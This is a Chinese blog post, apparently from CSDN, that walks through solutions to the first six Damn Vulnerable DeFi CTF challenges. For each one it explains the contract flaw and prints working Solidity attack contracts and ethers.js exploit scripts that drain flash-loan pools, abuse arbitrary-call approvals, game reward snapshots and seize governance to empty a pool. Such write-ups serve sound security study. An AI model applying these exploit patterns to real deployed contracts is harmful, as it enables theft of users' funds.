【damnvulnerabledefi】ctf挑战1-6

最新推荐文章于 2024-05-24 09:52:23 发布
最新推荐文章于 2024-05-24 09:52:23 发布
阅读量457 收藏 1
点赞数 1
文章标签: 区块链 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Timmbe/article/details/123036971
版权

ctf网址:https://www.damnvulnerabledefi.xyz/

第一题:unstoppable

代码中定义变量来记录tokenbalance来判断是否与当前balance相等,如果调用token的transfer发送给pool一点token就会让判断失败flashLoan函数就会恒定失败无法完成。

exp代码:

await this.token.connect(attacker).transfer(this.pool.address,INITIAL_ATTACKER_TOKEN_BALANCE);

第二题:Naive receiver
合约FlashLoanReceiver只判断了msg.sender是否等于pool。
所以通过调用10次闪电贷合约borrower地址填写FlashLoanReceiver地址就可以将FlashLoanReceiver内的eth清空,
exp代码:
合约代码:

import "../naive-receiver/NaiveReceiverLenderPool.sol";
contract AttackNaiveReceiver {
    NaiveReceiverLenderPool pool;

    constructor(address payable _pool) {
        pool = NaiveReceiverLenderPool(_pool);
    }

    function attack(address victim) public {
        for (int i=0; i < 10; i++ ) {
            pool.flashLoan(victim, 1 ether);
        }
    }
    
}

利用代码:

 const AttackFactory = await ethers.getContractFactory("AttackNaiveReceiver", attacker);
const attackContract = await AttackFactory.deploy(this.pool.address);
await attackContract.attack(this.receiver.address);

第三题:Truster
TrusterLenderPool 合约中闪电贷可以调用任意合约的任意函数。通过让合约调用token的approve函数来授权给attacker,再通过transferfrom将token转移给自己就能将token收走。
exp代码:

	const abi = ["function approve(address spender, uint256 amount)"]
	const iface = new ethers.utils.Interface(abi);
	const data = iface.encodeFunctionData("approve", [attacker.address, ethers.constants.MaxUint256]);
    await this.pool.flashLoan(0, attacker.address, this.token.address, data);
   	await this.token.connect(attacker).transferFrom(this.pool.address, attacker.address, TOKENS_IN_POOL);

第四题:SideEntrance
合约SideEntranceLenderPool中闪电贷函数没什么问题,但有一个deposit函数可以将eth再放回合约,通过flashLoan后再调用withdraw函数即可将合约中的eth转移给attacker。
exp代码:
合约代码:

import "./SideEntranceLenderPool.sol";

contract AttackSideEntrance{
    SideEntranceLenderPool pool;
    address owner;
    constructor(address payable _pool) {
        pool = SideEntranceLenderPool(_pool);
        owner = payable(msg.sender);
    }
    function execute()public payable{
        pool.deposit{value:address(this).balance}();
    }
    function attack(uint256 amount) public payable{
        pool.flashLoan(amount);
        pool.withdraw();
    }
    receive () external payable {
        payable(owner).transfer(address(this).balance);
    }
}

利用代码:

const AttackFactory = await ethers.getContractFactory("AttackSideEntrance", attacker);
const attackContract = await AttackFactory.deploy(this.pool.address);
await attackContract.attack(ETHER_IN_POOL);

第五题:The rewarder
在新的一轮中如果第一个调用distributeRewards就能执行accToken.snapshot()设置balance并且根据token数量的百分比分配token,而在deposit中有distributeRewards函数。如果通过闪电贷借大量token再deposit就能拿到新一轮的大量token。
exp代码:

import "../the-rewarder/FlashLoanerPool.sol";
import "../the-rewarder/TheRewarderPool.sol";
import "../DamnValuableToken.sol";
contract AttackReward {
    FlashLoanerPool pool;
    DamnValuableToken public immutable liquidityToken;
    TheRewarderPool rewardPool;
    address payable owner;
    constructor(
        address poolAddress,
        address liquidityTokenAddress,
        address rewardPoolAddress,
        address payable _owner
    ) {
        pool = FlashLoanerPool(poolAddress);
        liquidityToken = DamnValuableToken(liquidityTokenAddress);
        rewardPool = TheRewarderPool(rewardPoolAddress);
        owner = _owner;
    }

    function attack(uint256 amount) external {
        pool.flashLoan(amount);
    }

    function receiveFlashLoan(uint256 amount) external {
       
        liquidityToken.approve(address(rewardPool), amount);
        rewardPool.deposit(amount);
        rewardPool.withdraw(amount);
        liquidityToken.transfer(address(pool), amount);
        uint256 currBal = rewardPool.rewardToken().balanceOf(address(this));
        rewardPool.rewardToken().transfer(owner, currBal);
    }
}

利用代码:

const AttackRewardFactory = await ethers.getContractFactory("AttackReward", attacker);
        const attackContract = await AttackRewardFactory
        .deploy(
            this.flashLoanPool.address, 
            this.liquidityToken.address, 
            this.rewarderPool.address,
            attacker.address)
        await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]); // 5 days
        await attackContract.attack(TOKENS_IN_LENDER_POOL);

第六题:Selfie
函数queueAction可以提交执行请求并且2天后通过执行executeaction执行任意函数,闪电贷借取大于1/2总数的token,并调用token的Snapshot后提交drainAllFunds的请求并在2天后执行就能提取SelfiePool所用的token;
exp代码:
合约代码:

import "../selfie/SelfiePool.sol";
import "../DamnValuableTokenSnapshot.sol";

contract AttackSelfie {
    SelfiePool pool;
    DamnValuableTokenSnapshot public governanceToken;
    address owner;
    constructor(
        address poolAddress,
        address governanceTokenAddress,
        address _owner
    ) {
        pool = SelfiePool(poolAddress);
        governanceToken = DamnValuableTokenSnapshot(governanceTokenAddress);
        owner = _owner;
    }

    function attack() public {
        uint256 amountToBorrow = pool.token().balanceOf(address(pool));
        pool.flashLoan(amountToBorrow);
    }

    function receiveTokens(address token, uint256 amount) external {
        governanceToken.snapshot();
        pool.governance().queueAction(
            address(pool),
            abi.encodeWithSignature("drainAllFunds(address)", owner),
            0
        );
        governanceToken.transfer(address(pool), amount);
    }
}

利用代码:

const AttackFactory = await ethers.getContractFactory("AttackSelfie", attacker);
        const attackContract = await AttackFactory.deploy(this.pool.address, this.token.address, attacker.address);
        await attackContract.attack();
        await ethers.provider.send("evm_increaseTime", [2 * 24 * 60 * 60]); // 5 days
        const attackGovernenceContract = this.governance.connect(attacker);
        await attackGovernenceContract.executeAction(1);
放牛日记
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Damn Vulnerable DeFi靶场实战(1-5)
m0_68764244的博客
10-29 1062
知道这一点后我们可以看看用户合约。题目只给了这个合约,这个合约包含三个函数,存,取和借,flashloan函数中限制了借的钱以及是否归还,并且调用者必须满足IFlashLoanEtherReceiver接口,因此调用者必须是一个合约,且满足此接口,那么execute函数则是我们可以自己定义的。经过上面的分析,我们的思路已经很明确了,就是在闪电贷合约中借钱,然后存入矿池中,继而得到奖励代币,再将奖励代币发送给attacker,然后将钱返还给闪电贷合约,即可完成攻击。
CTF隐写术挑战
weixin_45817996的博客
05-14 935
第一题:跳转提示 1、查看图片的尺寸: 500x420 的 png 图片,这种情况考虑把尺寸调成正方形 看看。 2、调整方法为用 winhex 打开图片,第 16-23 位负责图片大小,前四位负责 宽,后四位负责高,修改之后就可以看到 flag 值。Ctf 比赛中是看谁先拿到 FLAG 谁取胜。 第二题:跳转提示 1、使用 binwalk 工具分析图片,发现是合成文件,且有一部分文件是 zip 压缩 包。 2、使用 binwalk 自动分离文件.
damnvulnerabledefictf 7-11
Timmbe的博客
02-21 592
damnvulnerabledefi ctf
探索CTF安全挑战CTF Pwns项目
最新发布
gitblog_00078的博客
05-24 319
探索CTF安全挑战CTF Pwns项目 项目地址:https://gitcode.com/BrieflyX/ctf-pwns 在这个充满创新与竞争的时代,网络安全技能的锻炼和提升变得至关重要。如果你是一位热衷于解决网络安全问题的技术爱好者,或者想要磨炼你的逆向工程和漏洞利用技巧,那么这个开源项目——CTF Pwns 将是你不容错过的宝库。 项目介绍 CTF Pwns是一个精心收集的CTF(Cap...
ctf挑战
axi_ba的博客
12-08 231
网络渗透测试之实验四 目的:获取靶机Web Developer 文件/root/flag.
damn-vulnerable-defi
03-31
在Ethereum中破解DeFi实施的一系列挑战。 拥有快速贷款,Oracle,治理,NFT,贷款池等等! 由在OpenZeppelin创建 玩 访问 ! 故障排除 有些用户报告与节点的特定版本。 我已经成功安装了所有依赖项,并使用v12.20.0版本执行了所有挑战。 如果您使用的是其他版本的节点,并且在设置过程中遇到问题,请尝试切换到v12.20.0版本。 有些用户报告与在超时设定package.json文件“的赏赐”的挑战。 如果您在执行此挑战的利用程序时遇到麻烦,请尝试增加超时时间。 免责声明 该存储库中的所有Solidity代码,实践和模式都是DAMN易受攻击的,并且仅用于教育目的。 请勿在生产中使用。
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
DVWA(Damn Vulnerable Web Application)
02-26
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有Brute Force(暴力(破解))、Command Injection(命令行注入) 、CSRF(跨站请求伪造)等十个模块
solEditor 国外的一款SOL文件编辑器
12-12
国外的一款sol文件编辑器,功能很强大!可以编辑任意一份sol文件,唯一美中不足的就是对中文支持不好!但对了解SOL文档的结构很有帮助!
[区块链安全-Damn-Vulnerable-DeFi]区块链DeFi智能合约安全实战-连载中
Young
09-21 794
DeFi 智能合约攻防实战
Damn Vulnerable DeFi靶场实战(11-13)
m0_68764244的博客
11-14 560
题目要求:大意是有一个Gnosis Safe的钱包注册表,有人部署或者注册钱包时,会获得十个DVT代币,目前有四个人注册了,注册表中有四十个DVT代币,我们需要获取这四十个代币。WalletRegistry.sol合约: 题目只给了这一个合约,合约中前两个函数分别是给address增加权限和删除权限,第三个函数就是我们要达到的目标,其中的限制条件非常多,我们来仔细分析一下这个函数。 首先,确保合约拥有足够的token。 第二,,调用者必须要是代理工厂合约。 第三,,限制了传入的singleton必须是Gn
[区块链安全-Damn_Vulnerable_DeFi]区块链DeFi智能合约安全实战(V3.0.0)(已完结)
Young
04-16 1192
Damn Vulnerable DeFi : 区块链智能合约安全CTF系列教程
Damn Vulnerable Web App (DVWA)
VMLINUZ的专栏
08-19 2443
http://www.dvwa.co.uk/   Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and to
探索安全漏洞的艺术:OpenZeppelin's Damn Vulnerable DeFi
gitblog_00011的博客
04-14 300
探索安全漏洞的艺术:OpenZeppelin's Damn Vulnerable DeFi 项目地址:https://gitcode.com/OpenZeppelin/damn-vulnerable-defi OpenZeppelin's Damn Vulnerable DeFi 是一个开源项目,旨在为开发者提供一种独特的方式学习和理解智能合约的安全性,特别是针对去中心化金融(DeFi)领域的应用...
CTF挑战:WP1-ctfshow解题攻略
6. **目录遍历攻击**: - 目录遍历是一种攻击技术,通过尝试访问网站上未公开的路径来查找敏感文件。在这里,挑战可能是遍历整个网站目录来找到隐藏的flag文件。 7. **PHPINFO**: - `phpinfo.php`是一个常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值